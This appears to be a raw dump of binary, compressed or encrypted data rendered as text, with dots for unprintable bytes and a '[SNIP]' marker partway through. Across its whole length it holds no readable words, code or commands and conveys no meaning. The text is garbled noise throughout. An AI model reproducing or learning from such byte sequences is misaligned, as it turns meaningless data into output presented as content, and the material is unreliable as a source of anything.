I.r....x.........th..NE..g..z..(<.....Y{...8..'....N.....u.2o....X    ..g..g;>B"...^-.....C@.r...X...-N..$.*.....B.4UI;v...wp....q.\..a..(H.c.za_...Zrp_......3s....p....x5.#mR..L.R.w.K..gL....:..z..S..>.%#..nIVn.......^...n.g...T#.,#l........a.Q..-.    ..Xs...F.7B'A.......D2.p..3....(A(v.5?HG....2..J...uz2.R.<.....L.>.%....{..%...JR
....vWK5E....y3.]G....S.0....*...r...d........"L..|`.z..z.:0..h.T.O.>...C.r..8.W.l....../A.....A.LJ...s..F.(M&.;H...22....S.....S}5...L...\R.}...&+.........M.Lv...8..\5p.%.9.....Dr.k.[.T.p....z.l...
%    .H4...r..:.-!:.....~..V..T........y[......0..r.#.ah)?h`D%....!....P.Sl....I.G.u....';....A&.i..ai....ba.....[.,t]..p..~.>7..Zq..x`=m.ce...yK.....g..gLJM.....y..MB"k....H.l..v..<>1.......k...    ?......6..s.0.F./..oY..>-4}...#.(.j...]L..;O5.%i-m.~}y...3....r....    1.a)T;?...7^.....H..D...5.....s.T...U..5aZ...C.A....I.DR}...|b..>-_...
,U....?$..v.1z.|?.<?..A..tpc(.....    /...i..j..F.7...3j,.E1..M..r.5.R...-'2A)._.-.. enM......7....s.......,..nZ...u|...4.REEoF..........`=$...fS..k.....$*......_.k..C_..
p..~....._;7.!.l.....%~.v.8Y..?fD.....7.-/....t....=a.....ue.vy.E`'.....%!.....9b*......_.
.7..j.s...i..k.....eU.?......P2..
.ad.-O.WqN.M.m..@#..3q.....0Q..AP.@2..'..,;...>...FS.[.Bh..$S...G.-.7...y5I....8.\.x....A'..o..(9.......r.z.=..O#.c.J...=F.....W....v..;A.A..[Y(......W.U...9........}./.i...6..._HQY...%G.vW.(.nJ.&9~F.....a.........../..........~.3....=).^}T.6u.#%^wLO.......6.c...Sn,D...?sW7...(..u..b.f..h..=-X.X.G1..8.I..w...Q..E5}z.rQ..H..e?......*&B:{;....[..z..^.p. .YYi..........j....U.......S`?Xp.[.....!..5w.a......!8N.(.....&.J.....    q....K.'..Mf.....-w.0`.,.....GV....    .=:To..B...k]{...xJhM&.6.el...._MY..Ly.f..n.>...k..z<.U..##.+.-........6.w..8.$!?{.....9...T.}9y0U.%S....B.Z..D......nl..%...,..8.L......EH)_...$...c..Z.1...8Z1..w......Qu....0.Y....[..8...%&._.&=3.Maj..G...$f[1.dQ....ycQ.}.......'./.1.-.a..j....<z1.HQ.g.V......D .. (.p!.r......    .|..j............#K_N.*.....{g...q...v@...D3.M....A..N.s.b.I.q..8.qEH$..`Nr^N!.g.......6...bno.Y.....".e...[...Q.:.,.|.n....R..@.
..ae5..l...G..    .M..=..PF!.q.HKx.?F_...Uf.T...-.{....    "...3..v..../5.es...L4..(U.N ...z...p....Z^z...I...fR.3i/.|p...mB2w......    .D..R.|u..>0...vj&....k...i...    )p.......*N.E./......+..aM-K-.....7..P9......k....{..{..1..`.@CuQ...c....{    l.O......eE.........]..w1...g.z........ .1.-...!3..94..PC....'...3....h^M
..J....(..u.)F..P.....|xw.u.{}M.F.s>...;NG4...)..WJ..h2..*._.
.....X..|#TI...9.&Tv..6=.a.F.P.B5uf..t....... ..!D.*........"x.....|.x.    .4+i.$:....!2[%. | T........O.{a...).....u.....=
..I.f\.......l..~.U=zF.. LI...}..O.#.LY...PU^jPu[.^.:h(.Y........B9........."......w.#2K.c~.O.U.S..
)....:...]8C....j.......v.u..}l.sk..;F]...B....G...\ob.h.#.......p....1.W6(.L...-l.B..[.)..!.......}.En..)..E.9.`C..    N.Mon`.....M.<9{...(.z..Z.7).g.v...."6^j..$_...Tf...9......{B.e.%.}.....$..|..w.!kP.[Xd..D#.2.A:.&.A.wD..aEW..    .B1:=3..^H.;L.=...0.7x..h8.......0...]l....6.......jn..V.ta0L.:~......M0d........c....L.O...l..N.......1}....tI.{..H.!..G..X.O..\b......3..b....!.y..C>X\N...rHV.!b..Yf..8. .U...wkr.w`y.:....
.&.k+..U. A.....v'.~..i.HM>I.=........Yi..rWC....W...    r....Q`..".`.    .....N[.w.1.....,9...O;...V-....9...x.'.r.......SV....q....j..[Ds.....p[)...3E.g$2"S+..a......&c.........\l.r..'4X}..['..d.$}.|.....b]..;,..6.7....'..h.oQ.b...
^ .9k........d...(.....y.-#.....V...1..XseK..."a........W~}ijT.......V...?...F.|v]...........X...F..uxkuv...B1;....W....{JE.Y..r..q6....q....|s......2M.@.L1...V..../.R.%^...58..e.c...8..]..y..Y..$.....O.{h2..!...T..U'.F....h.z.(_.8z.t..........(......F...2...8..t..J!.#...F....a...\bF...].eY .
?.H]j].....ZG.....K"..O........|..E.R.....YH....IA...i.0..X..].oI......;G.x...!ILV..K...Y1......[..+..[..d6.D...G.....0l;...c.Z../W._@....7.gml\1.3...\M..;....[=d.w|?..g...@4B.O..M.b..{.8qB..<.....6#}.~.......y...Y..Ap=........F..u.j...[..q~J.qD.............v.......Lb.    O.dg .8^..;...........1G...W>.1f.b.\.'..3p.#.^@.j>x....g.8...uS.x..e.f0.C.Xb..Yx.....&...|6...+......A..Ek..~"..?rP..g...f.*~...........
. `L...).i..g...
.lJ.K.{..{bc.....9t.P...L|h5..U..aS.4.......M.[...Xk_...Y..G.....P.f(.......
.$......^M..f..<...[.<.j..2.'J.X .9...R..uLB...r.w'...H.j.z..X!&j.DK...S...D-......~..Y....F.e.M.K[.28...... .+..7Q;.xV# ..?...4I..q/.
......{..E.W\..L...Bv.^7O.......z.wp}c..@...8.0..,...&.)..&..6.5D.EB..?;..H.d.,.X7.;!.:.Z...R..t...wr...xJ...!...G.?..Q,H.............O.lDc.w..q.....".1....R@W6o....R..w.'.....L........jg<.......P|...[~m...xQ    kV.O.....P..O..A0Bb    .6..K... mQ.q.....J.K>{~.@..(....S........jt..~.!.......'...FV2...)#..k@.i.....9.......FD......G0....=.\..].GI[......B..=.    ...[.,$n..y...-.).k.6BJn..5a.DO...O....Qd0......1...b..oFL..3{.To...|JyI..2.9....1...p....[...l..s&.........d....q..6rJ..R].mgB..........7....}@..1f.....k...7.M..7&..../m .l.o...<..}.....y.k.0W`....D..g.....lVR..C.W..&%.?.a.....O.vS.vL1.~..I[...r........4O+..~t...Z......\....e........A.#E!.&q....1.../9.8..._'.^.R.C-.....9............&.L BO..t.dR.7F......g.2..%.]..U...|..i.a.].FAV\I..*.|G.c..........B..G...AxU..yUX.|.x>...    .........Ns......)#D.<...6.W@^I.f.j...9.RM...n \....a..*\\d...xw..._.w.c.{...*.V.Mg.....[..../FZ.........3....4...[`r........KX]..^....F.z.+......=...K.\...u./..{.!......PCF.]....|....R.gN.es.Ew.......~_..D...=...R#NV..*....%..j.vm.G..,...Xyj.pt]Gq|..&.t.Syv.`.......t...`...W.....ra.!.fw..&5...-..7..W.{V:...d_Dee&/.lI*#...........#.u..O..1"..3..V..FMJ....*..\.9..*3..l.Z.TX.1P..p...z..n.....h....p.e.+1..h../.n....8_.....r..^...\)x...w&.....9....B.........;\M..N......]Tc....a/...{...c.M.Vt..e.SU......x.......X6.....f/..ih.....~9.iG<........]..b.U    c3..E......t.t......r%!.|m...^*x..wr..?..7.]T.Kr+2..#..3.&...|...~a....5..RT.qp
..:S.N...
.\k.m....[^..3...*..E?...........^..5...y..V.#L..k...9..ug..Co^..;.g.......Sq..w:n.G..W....T.~hS<.........b..)...Z3..}.....oL....~.6.T.=.....N1....Z......?.....).w.....$....W.A..A.:d........W....w..ba.....d.Cs..........A.....~zD..*<..d.8....~.r,v..L.......gP.Z...G....,B..[..l!.w.U.Y(..&.....4..{..h..L.....[RH..Tr.9.o_.8.p..dQ....%....\...m.O.I......^.Y...t.?.p%.
x.......['8@....>.L..X..%.l....]a.....F.....@....s.;.v.FkX.F%..n....+f....1>G.l.7q'.{..../..>.#..<..k.W...b....1..E7
..@._    Y....[un.*.......N....Q........8.l./...Y.....f..U.........*.fQ}..[......w....a.(U.\
.B.u.i.o.p.jp0.+.......`"    .gD.....`.0s.>...cb....).[J.g...\....7......Mj...6:..M...|..........SP.{.FW.;K.0.C..s....V.......f*.    .{.r...7.\.[..!.....R.C.%4..XD....E.v..n}...
FF.%..I.f.+|#....2...........K.3.|6..r?...0#d..e..^w|.?.mPY..*..T.t.....;.Sl.E.$..l-..r_..,..)...{..r?R_.......>. ..L..n..;6.|...o.o...K.....kx.v.......^{...!i)...S$Q.....o.{..*...k{..QW..;...T.u:S.Y."}.*+.@$At....z.c.M86..L.I.[a.m..M..t.9_.`..W...;.g.."#.....C.!...B.....d[..:X.._*.. ..............sJ.:.d.Q....T...y@.l8......}M....S.......pE...R...1.\..W~........:...ii....@..|..k.....x E.I..nb..B....6.Ik.&...%.".\..5....@_._s............f..tY.....~u..9...H.q.7)f....n(A./($W.uZ).-....U..6..~.....07^f...U...=... ..&.K..t[,@b..j.    !.8.K..T...;5P.[.:@.1..V!;.:..3..$...S....`...D......8'........l/....k..?...K>...f..E.Q...;.......V....g.+..2?..F.MM.^m.s...i...^..Q..WR......#....`.(...W...Q.iL.@`<...Wc=K!......>.m..;...6.Y{.l.[G..b..1...x..\...mv6.[.    .    .`.8U..F.&CA.![U8...)..xQ...2BST...s../.b..h..N..o.......;.i.du..>7.    ....).h.....d.e...0.C..A.C....`..JVW...0i#..*/T&hL..=24.P.(,.........r....fT.7....Q.i8..Fe..W...o...../e.0Z%......T2H...gm...X.......... .<".xj.P8..g.y7.......Q.dR%p..E..X.).s..<...c.....0.EQ@
,...h.h7......Lr)..-L....y.}.I.`#..{...?>q*.(...4..P...,G.9Y..&..a.....8.nhg....    .z[b%.    A \t.'v..B.;B...p}F+.?.GY...2..'<..    ..u}.R..3....N.....q.Dn?.N...`m...P.hW..&..V^...ws3M./.g.,..6......-.;hj..8..\3..v...EC.F..R..P..G.<)..F.A........5...|.RJW.T.\l.Z.2.i......I...........~d..=..>.....k.l....X2'.....$1N....UJh.+x2B..0.>*.."..N..<oR.=.@|\.x.|..<.
.H....Z.'...|.Q.T"..@0.....h...|5....Gq.......I{...*.....4......j.f-5s.di#(#..Va...DM..as....9..E.....KX~.....MQ;..7...6X....X...
.)7k.a..dt..<UmS/:.QX]...-..@9..6....m.......!w.)p..8.....g1....zI.Gca.0..au5E..........O7..6.h....e..o...x.........Q..../.G...!c..!.P....O.........x&./3...d3..*.k.e..lDf    $....P-."..VR.. ...o...=.....g..)..*....bT._....V@..2.VL..L.4)..XA..."VC.....r~..X...].|7.[.izF..v_rM.n......7...<.X.j..j..K.>.[.^..[.c
....X.N....B.E..u...../
...<z&.._.).b.....5j.%kt8`9...>%...Z..u...C.3.N......PJ`.K..x.D#....A%.)...Xc.n.YK.\..l..Y........].w..l.z....}.._n.............UVG.....1.?s.Pws...........-...s.F['ON.......'..9V?Z..V)..F..hB.;...zOE3....'.r.eDd.Q.H...Mv..k..hs....#q.<E..D.p.y. ..G....O.."....%.Mt{J..(B..9.....I..3. .^A:....w...4.3P.    .;<<K...=.I#.UC..    X6.....k.x.....6".2......&...6....S.y)"O..C5.
($.0G.FGT....\W..Q$.#..c....+....`!&fSFv.;../..l..R..H...|.j>..)s@GaP...D.Uy...f.D...Z...]Z._P..?..sr....Hi.m.........=...^..z.@k..........N...f.>....|.6:*...!..(...j.+...6..3..._8.s..t..2*..ve;...#.w..Z....UX......v.`..1......=f.z.h.y.............4.r.....0.Qy..D.3.....y...I...x.....Kc.\..Xp...!.apyBb.. ..C.<.Rg......SCRh.Q6..\.#...u...4O?.k..t...s@.Kp........n.......12.m..{...a.......F3K........f<.}?;..0....J....&..6.....]Xh...{
kUo...y'....n%v.-..HB....c'c..].m..a;..j"..#.B....o....hx...w;1.6S...d.I.7.....e.    ..[Piv..oN....?<..e.c~..................j.|...g..9Q....0.{.H4ox6>...3.I5...N.OT.,........6mq.Q$...}%*..?..Yga....-0(.p.....$..P..q<...Xd@XA...@.EP.O....D........%.K|....W:`^....x.....r.r....c~.
..&..J.Y...]-.Z`.g...a...........L..2D.........x..P....D...\......2..."..........N1....../{.....jqt
.cj..O.....X...X.'..{.1..]..Q..[n.u..>.....w....(3#\.. ...;.pT...(..-}W...O%_...........'.L)ZOh.#r.JL..lp.......le.. W<L.....'..!.f.....^......5G...Y...m..N6FKV<4..w.}..$C.&H.e...._..`...X.......=I!Q.9...#....$L7.l(..9.D....=.'.....UPe$4?/'g...e-$e....'.a....ubGu..f.aI..aGk.-+a..fo_...e.....o.=........g(...t.43...)d^..M......%>.8S.    )..C..;....yOQfqw.#..7=.j.l..Z%..=.$.....uLn...9>
...[SNIP]...
<......9S?*>..t.i..sIE.+..6...<%..|..............A....k7w.k-.]P..G.;<i..{.N.U..!.;x.....T.v...)kP....!z7..R_./..?....8>..SR.e...I..df5...H.\IC..q.......;..v%j..UX]v....=.1.....c.^.|..M......p..V.{.......0....`.\.......z....h]>I..^?.....m.......??..|.H.}s.;=nI.C......:..:.h-.....V..=.=.]....y.:.Cv."*.s:K.eVI.q..fe........g6.I.V.euNZK.U..|Jx9[&....|..<W......R.Ap.fV...?..Eb$....[.?......z.=...w...oN.1N..xW.9$....R.W.0.rmz.....Bh.....6n..&.&.}D<......H.'. .}..`9...P.)3@U..W.......muo.....O...To.'."...m.X|j.....ua.O...)wA..\f|.).Q.    .....
..\.KF.O=.Ea..
.loy.Q..)y......._...'....l.o[+7..sy...^.({Y..6Y.)Z4;OZ..F.f..YK$...s'5}.V......O...q.Q:d#~Z..C.[....U..I...T..Ez.......i.;..A....Rpz..&../.o.b.$^..?.T.B...J...U..fG...&...........
..........dT../..6......B9....J..3R.....~5r..G.....G..,..o..m:....i6.20.......UDs._Ax..T5./..i.....%+<e...........x
..9.J;..........6.{@p..Y.U.]u.D.T..6_..i}.....w.j.O.,T<&1.X.*I.WuKV+8.K.c...j..plk..w.U.I...;z....1.....`..j ..f.....m..A4.........K.j.'g.]..8...&........7V..........].....^....C...F......-[.tR($.G.|.Y...'........a.u....I.\..'ow...]X&......E.k.h9......f_..y...C.W|f........c...,..$...w!..@mb...&7.....Q.O.8A.
.`~35 ..E.x.....C6.L^K.~.......YQ1V.)......XA..J..F.9+ ....'.N...m.o$.!3...q..Q.D.S.....    ...\3...|.....6...L.x`Y.....7t.41.RZ....U`d.p&...

.......I.p..[..6.8.....F.efw.P...%9L+...<L..H....#.."...gK....X.M^U.../h....>....h'....en......OK..:h....d..'...:.n.J.......V....H1........cl4......t....T.(.*..m.w....?..i'|..:..B.l..v......^.aU.....-..E^m....5..K>.!......9.......Z..l./2.0..x4..y..1.}..b..;.?`.......Y...E...0.)....9..<..=;Z..:x`+........C.)..P!.....3.....^.uP......aIm.....]D.v@.Y7.<n.z.(...V....J..}..|,...D..3.o...W..u;P...5U.:.7..rk..I.d.......98.6.c.g......@"..H..,.0.......\.pg.N..J-......Q.R../...0..A7.......P.Hp.    ....WB...U......IgER;B8]...E..dv".......z.:.{9.."....d/{_..qa...N...Ta..:lu...B.o...C..U&...uDi.....sQ...`..+1.Xs..h.........$".."...!......xE0.*p1-.VmX....u....fC.....K.m.;.$D..%.......O.sq!..u...5x.....5$...lR.O8l.t..I....,.V.4...`..7o"A..vY.f.........3.w.Hhl....g.s...o.....C..?.O0s.DR....YF.}..W.-    ..q.EX><f.....h.$.........`.v.X&.......qN...71.&a...........[....g=.?.&E.f    ..se..YE....v.......-.....b..21[h..M.rK"0>..........8..pp.... .m.Y~.x9oP.1...f)...S.......CU.N.}..w.QQ....O..Z]`F...........>W...Ug[.`b...\....B.    ........~....`.i2{....x/.....Ys/..*.}.z7H.M.M.....2.$..)..}...8..._:.........A..*...<...I)..1..bL....Y..N.......(...fD.iL......N...d.QT....|l.^'5..7..BypZser..j.....*:.H......-.KU.....}..wr..j^i.:O.......A.....^.-.R..P)J..I.$.do.o.8.R...g...354........=yX._.a.m.4-u.. .. tdP....^....
..V.....K..[.....6@.tX...}.>...t..V..#.1S..b~....l ....#Lc,..W ].!_.
Up4$.2s.( .9.#.....%......&.......}CLVI2..7..I/
.
.........u:
.......$...I.G....1...0..hP*j<1...@...y.@....;..-."...].{.._..|.L....i...a.........!.....W..q......j.\./..!..o
.../fJ.|.W...w?@..5.......>.c.....j....y.Q....os..    ........\P^....*zc..pl~K....m;l@..{..]........^.Q0O..h..6[...B....L|.b....{...O.....<...rC3h..t.Z...e..+.c....&...3..f..LJ"/Q'Ec.....p......?.......mhu..k.E...1[W.`.@....v..y|&..X<.........q]..bb7.0..ZA2...F@.............{:...-..bN..n.i...j...F...K'..V........N/h.RY'...o).....>.....ef.].....S....|(22.T....&.,..T{.P...3.?.
......<Meb...'l..........^..j......F...).U.|r......y...)~?...Q..........[..."e...D[.2Av...>....}`..._..R..~.7.    ....!Y..o.    c.(/.....x...0k]EC..E\-7...7 ..`G1..V.......f........mr<.?.v...Y?...\[tj....F...\.........a...}|qbP......J!-.B..q8..D....L........2.0.o.m..3..aZ.....5....6n.U".c.R.h.A.......tq..ZN..9P.cH.....T.|?.y.'...!..Gp.<......LF....>...<....z:|.......7U|.A...E.c0.1hw.85@h4Cx...|.$.7................a...A....
..#.k    .&".bi.Y....82f:.....z.......T.v.!pS.....k.\.L.^.........P...,........h~<.2&T.3.|?...D...Q117......[.)...zi;3.E*.l..I...........&....Tl.j....9..u..r<.)Vd..[...w..5.....arJL.Ku...u..j..5..1.....sqm.t"....y.Y.6...eQ..............B.i~B.E$d.g2.l.zNZWR
......t.o...4.&C..Ay&.L.a./.7.....IM'.m,.<F.....1k.*`W..0.....u........."..V .v.@.O.kz........2..t..9. ..j..f.o....5...%zI."Z...(.......1.@7.P....Y......)'....~.p....@H...X.Eo.v..Y.CAn...X...w..q............bI.l.Bt.R......$(..    .....b..rn.........1..8-.9...'..]..H.Fqv'O..&%..}.
.&D,.O.h.!.......S.i..!J...G...4!.Ot_$..z~.(..1..
....U)l.HU..G..+C...........>-..    ..7P...
..&..<..JdXz..M.."..._..k-{...x/1....8.>..a....    0Q..0i....@3]..    ..t...UJT...8|f.`.d.7.;..*i....:A..+^.....Tx...._.~V~,......E.A..P.[.Ik.9...7F{K../M...C.....{8J..w..B!:G....Q..s.....@q`...>.M.;@......_...C.....=......<^.~....P..z...H.9.b.
....]...e.H. 'dMx...kk..    ...*pA...?.~...i........SMV.I......V.....Js.X..=3<Tw.ZA.K.0.s...:.EI.p!.K..9h..k..@...m.c..}.....y...h.k.P..`Lb..}...+..$.9...V1Cm....BM...    .F...c..\..M.2.o.    M.n,...W...w.vP.VjQ..W6x_...N....l.m{..Yu.D....\.(O.WB...k....C......2...f)..6...........f......?../....(......QnA.v.a...5x.."...K[..Q.....6...@..W{.R?Sf.g..
...$.....,..\]..1y..Fz...M..u...m.ZQ......Q.F.......,.....@K8YE..............b.......4...L....88.Jk.PK.....k......!Yx......g.]....u...].?..X$.*C..i.....U.yJ..Z]6....R....._.0...}._.aMx.n.ZENI.....{..e....z....#Z\.$..]..%F.....8..._.X..c.>.O.g...T..p./...Dq..0 Z.U..!...4....E2.].T.tl...W..c...p.AU.w..n^b..a.V5"....U3.....2z..W...~.....r.
...fv.0.7.1.g..$!$..E\v.p..4i1..(...%7..Kh..../x.k.....#....@3.W...o..Q.}Om./.'..M..Ju=.i7.ba..l.E..y..Z..\.[_....I.;..\..:]sKC..a......nn.+..a.1...{.R3/d......XBw....e..i}I..tn.E..K2.."5..1....ry...q.... 3;2...O...../.DF..    .L.ss\.,,/.........    |...*..C.%V...d[..Gs..i..VNK6p!.......d...Un....].1.0..5........?...."?Sd...9..}3......s;U.8.b}.6..Y4..D..dc....!    |...j../...m.r..=.|$......;...v..@...\....6....M2....\.m.........m.~....+e..:...8.(....w"    e    ......$..^R..G..    J.0(..k...x.IS,...6.....oU.r.....    .i1..H.........    .U...'.....5..\.T;x..h........Sf.m.q...zP.l..X|..k......q....+.S_$A...s..$..u....E/+..k.t..pz.C...+\......5i...FzuP..i.y.$.W...$...@....c...F..n...I...    ..QR..g...o..4..V4. $.....v8.4Ae.... ..L .Z........z.k...0[.f.S........H........Xn.......:I....w.N.Br...`..{2i2....X3...z.4C7.%.dW.&.WJ......BP....L1\....."V[.S.S..Z....g..<H_;..G..
u...........[V.i~.c    ....x.....N..W6.w....:.b..<......{+....}.'.dL.Q~.TG..8...P.........7TU8.!0.........8qosWH...x.......U.2.gW...A.w,.Qj.....S..G.....S.{... .|.$3
w2.........7....;.,i..$.o..o3..=Z..mN:-..f.p.`M.^M..8K.
...2g%kof..3....[..[.    .@...gX.I.....%......~.=..../..P........&Q......A..5.././{{...v."g#.]=...v.....j...7....9..L~V5....d.N..Y....gbZ.e.......s.\.E..
D.i.<e\.|.m3.e<4.;.4...C.^...Y.?e1ag.j*.!.{....
.......>.u.!H.J......"2..Z9.V...6.7...<..H.W..71.3!.....).......p..w......e......~x.S@._.?....o...4.8.n.^g2..}.,r..U.+.......RbR....k. i..9...U..N.uJ..@..a.l.!    ..F+....,b.....>apZ.F<..#..Y.y.{.G.Y...#.3...-...GI..y.-.3..V..7...n$.He.....C+....}...)..9.QC..U. ....>..M..._i.oH..JuT;4...h}.......R..#
....=.?W0.[..p........k.sAa.C*......)I........1%.5.._.......e..u9
...=.!a......+...:.........o8..t.E....W...=............>S......*-....H.....9..W.w..    .q.B...'3.Q..?U!.^..Lt.R.g'.......E6u.
.~.b....)..C.e.Z..w".......8...p..e.y.....7.....    Ec..k..p...z...(.i.#.......p'._n~e...ov..+.:.!f,.2.?]&.0.-.D F.lpW.....+....7y.^.....k/r...@.=..n.\.U......O.`..[}.b.k.}z.dap?...p.
.M.8......=I@..`......H4....J...    ..*5..g.<Zm..p{..e-aU9....J...n.`u...U....%.1..$...g..1..8.. ,t|].L$2..EX.Q
9....j..i.E...b....37H...7.......P...`...c..:./.j.\[.Z.$. .1.%7.(..^.....%.@X..c.`c..j......$.aN..j...|p.2.....3C9.i...A..v....... .t.....d..`....R.w,...r..>C...7..w.Sv..c."...X...`|{...+^`Eaa.......Ni.b...A.....9H......W...Y[w.J.R....@V..-..X.....z.F..........|.....i...O..X*....G..%...n...w:..........7.q.%/...........1z.a,4...Na........v=~'/.....z/%.R..=.!.Xc...Ym..r&..N...&.Z9=.0....Y.L.e[.Q..T..m.3..S$.....r.....C....z^z@w...^.oS..M..}...0.a.<...x..w.L=#oZ.N.    .^N..YyV.9..7.d7.......tW!.<Dk....:@k..{.....'nh+.
j.|..<....'u.u.1K.349..+....&vm...#    fC...Q..57^.....?...
c..x.2.g...c.o.A..f).'.....j..G....+&.].\.z....m.......N....
........D.jE...,cB......Gk.....&..Dj...w~}..q..................@....:(.....W..s.........    ...G..EN...$yT..hD..xEar.....Q/.L;.V.c.....T.u...P..\.......#..^.
f]...Fl%s..?..w..<.:h.t..~..+..E%..)Atj.t..!...m.$k..A....W._O.c.!.`eO....uM....-.^.l.......a..:.Z.v..[.D.u.x.f D..k.c..1\...WO>w....'.g.#.........n..xP./... .=...5.....e.jd..u.p.8q.[p....Dp.vT..P.r.....Y..%FL.Gp....W..D...N+VT...'...=.
..ma.........`.....    c...#kZ}..ni:.....(J.....;@V...s........j4.?OW..BV^.7^/..F..>..!. .L_.-......;.\.3....
...h.+04........C.N.,......."..N(._&.....MP......?..`.%.E2 Ao4.Z..*(..J....8i..+:G..tS...o..&[.0.w    ..IR..&.."..C.....:..8....k<j..pl..z.M.D.....@#(L....>b:...K.9.?....0*....HN0....~,. .O...?..u..................f<w..yU[.tC.....7...2.=...~...6j....V...s...}.B...+:.L)nN&z....#
.S.$-.y%@..'&..........=...3...l8O...@.B..X.WT...W..D..t../..."Zu.r..6q.IX..\.k.r$^X......X.:..g...<.x...X.u.W..G..l..F.%.......r.9.    .UV.....|..............p.DL).Z.|<..A.    ...hTc:KQ+.m..h....."...~....).q..t...Q..LL.e.E..5 N`.<..SHI..Zu.mqFS.L.9W..1..o...G.........F.Lw...X=...O......;.Z......V.$..3....j..x...9*0.b....R.....L.xl>.E..b..)S.m...AN.._vC.......5g..j.pc./.....I....)#/E....&C.\{..1U-2%.;s....W...d.z...C.&p...at.N.....w.N.G..d....3......().    ...%|.h.T.(E...eP.#.\-....{r..\..8%.L..+...,..A.#...>g...#..`D)yl..tF.AY.'..t..`....}J.....4+..[v.e'..5A<P.n...=B.<t..0..8...=f.n..........;.#}...S...V"qc."t..}\.NA.o0...8........_.v.....R..#\<..W..J..HIV...di.r......|Bpg...;.^pE.)Qp..q.1.......L.Ex.3c|
..........r.K.f..!...*..(.....VD.4~...v...Kq.....d.}...#...`..,R...q7sTv...;|.a(.s.....Z........Cd......;..eG].Xu..JP&......o....6;~Fzmx$..1.a.N.*%C6y..g.....i..P.....S..O.....St.l..4.UA.a,...QQzJ.c...h..    ......]6p....^U...d......;.+.\"a....iz.......z=).c..B'..8.rXc....b.I?...%.JT...M..3f....%r...o%...B..    ..............2....IhKf..#.&.,.G..l..~...o.c..$...............l..MG..J'.......]....7...m.me`v....S....Pq*7p...n....j.F.Ppo...P.T.O}....(..Y.D.q.ji.D..]..Ak......D*=.Y...Q......P.0..Eh.;..,T..r.$..O....C....t0.(..Q8....&...1a.{........._g,..A...c....h..C.H%.j.?G.?..V..5....[7.K(.x^.,G!F..zH.X"`..~.....
T..(..|.......>'..K.....E.....N.[9d....KE.....T4.o.=..l".31.]....".`..a.s.6.(........#cRe...h.....X..A.pWR..E......d.cZ.... u{7..@...&.}l..j..Jux...+.'0@.....!#......{..^J3.Nk....y.D...d'...:o6td.]..Q....Q.H.M    ..1\.&.l.j.aD{'....]._.P.^.p...~...(.V1b..&&.e..w..@. %........B..l...t.....i.........C>9....;a.....=..,.r..@.:.... ..*qn....q$$.k....Y%..bcUC5.\...4%.$.m.. .~&J......8.B".i+....iL..-........T.VJ..B'.<wX..x...............I....].....B.aM.(tJ*3s@;....A.....D..kZ......-.X.M...K...fj^..b.g..."..X.....n..h$\~..%.M...p':Z...].FKw......#.K...y{._...l.....@..p...3....L...>...cK..e._.Qe.{r..y............X.Lt.j...U.?>._........O......X....8.......JumI...N.l.N4.5.I.... .|.(R..c.....S*.sN.U..KG )2N....DKAP...m..WI=Xm...+-I..    .....S.M.4.....}B.....
....2Tn.c...i}.S..v.....WMX.C../1......#.-......2hB..=.D........E.....B{.J.S.!...    6.X.....L........5d>7{..r.......y-F..f./$80T %....d@#@<.%..t..~`)M.UL......J.?.'......\...7.9.Yg...$.....?.$~.B...d........u}.A7..\.....xRM.....l.D.ih.U'T..v..uR.`pT...A~.P.*.3.....f.=. y....Q......p.    =..Wa6d.............g&.B4........_...4.N.......[2..F..T4....l>.    .R2.h....VZ$..MZ...$...Va..?...w.......Z.+..
......Q..ZJ%.....h<}Z\.....f....j.^T..k.q#'{....~.9..(.d....;DDM...h ...fsqze+0s...j0l0#&....xO4.9l-:...O...F..N.=.K>..S."._.w.5..7....^.....^*3..`l.N.^bNJ........"I:...G..a.&.o.DnJ..?...G/IN\@..hD.F.K.?.....[W.a...QD.Pnu3>.h>.".$..Xk..e..........B~....c...l.i.x.nG...+.AF.z{..\......<..$.<.;.....A:..    ..nv......D.m......H.mT_..u.....D....iO....V...odV..n.....Xp.r
b ...3S...]U....A..0a....C. H...j    D%qQ.B.C...".j.7C.U....q:..)d...%.T-.G.7_...P:&...l..f....(m~..#..;E.....^.....F..+.$:.?..a5......X....k_....Q;XZ.....~.    ...]}fw}......p...............c.nu........u&.A~.u{g.).Q]..V5...D....60ez..i.4...r....G.s...z.uN.......}..x._...>On..T....=..k....@.Ljm.....Bp.&....Hh.@w.*:l>-E    .....c.. l...g|U..2b......L.L4...h..r_$B..J..2.....s.W1....<..j....p..W...kb    A.*..,5....A..Yv+%..<CiK.+B.    (..W$.h.J,r9D.r..z.....;...b...|......5.E..r$.%....nCt..0..{......I..p.....6<..E26.Z...lq...?.7.....x..>.-....s
Q....cj.."H.......2....
....9.[..~..s/R.r..DwQ.c..H...W';...A.L...........P...9.R.-.f.c....p..bE..`...s5,]..J.vR.K...(@....f.R....,....>...T........m7..........@KW~.....-.<..?...I..:*%G/W4..sr.e8...UO.Z.-U...p....    2N..i.|.8.*....0.\.c..l.....    j.u.#....(e..K...E...<.`.....P.....E...........z...y..I6...U.....
|........&..*|*..I_...._z..&......K%gS..j..?.dmqg.9T.;.6*$..~..W."...d.t ........($.'W..q.@.lB..B.
.N......^.<gZC...5M..p.iG.7.p.q......"?.m.>)....";...)u............0..'d:...'...BC$.Da...g.N.1.x
.".`"AP.H.........I....|...mS.JrZ......>.....*^.....01.    Ez....WX.Bp..[.Pb.mM@....Z7...p.4.....`\..h.W.........vW.C..@..A...JS..$.g3i..@..B.`...Y.d/.O....s..O..z#..E..}PH=o.N.cbRm.I.t...r.!..S...K...`.D....e.$...SG*l...|.....X..D...5...(....I.a.."...$#t....M.X...kc..F^.......t0eX.{N<.........LQ....N.J?9.    .w..h...cC.P.RSlf*&...p.......e..........f$I..-.uG..k..;.8o..".(/.u;zK.......[..Pe..B.~....N>.Z..W..mk....&..2 ......L....7..Pf..4.)WJ}B.......'...{|.Jt.P..9.j...    ....t.5.....'.(..H*.Md.|..a.......\..9....<...1....9"    .&i...$,.8.X...q.....<."L]...i......rU.<Z...uV.g..v).....O!.    ..*..i....\....6..F....-....iqb`.$+........1..[.\.]...8...........s.....K...!..\....2J.....].........G.Wd...ZT.g.e.....N..E.%....(...]....8...r........-......^.&l......f...t{.A....>.....!..5..ffb.Y9UCi...|..Z.dM...._..}........)..Ma<Lxy|x.O....i.....X...SD..~....*.P.+r.iI.....E........2..
.t..XU....A!gc8......%......Q-....w....
